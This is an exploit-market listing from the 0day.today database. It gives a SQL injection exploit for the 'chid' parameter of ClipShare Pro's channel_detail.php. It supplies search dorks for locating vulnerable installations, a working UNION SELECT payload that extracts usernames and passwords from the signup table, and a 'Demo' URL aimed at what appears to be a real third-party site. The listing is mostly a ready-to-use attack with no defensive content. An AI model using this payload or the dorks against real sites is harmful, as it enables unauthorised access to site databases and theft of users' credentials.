[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability

Author
Snakespc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4183
Category
web applications
Date add
15-11-2008
Platform
unsorted
==========================================================
ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability
==========================================================


===================================================SNAKES TEAM====================================================
+                                                                                                                =
=                          Script: clipShare Remote SQL Injection Vulnerability                                  +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =                                                                                    =
                =                            script:http://www.clip-share.com                        =
                =                                                                                    =
                =                               channel_detail.php?chid=                             =              
                 =================================== Snakespc ======================================    
D0rk: clipshare/channel_detail.php?chid=
Dork: Powered By SalSa Creations

Exploit:

http://localhost/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 

Demo :

http://www.salsavidz.com/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 	
                                                                      
===================================================================================================================



#  0day.today [2024-07-05]  #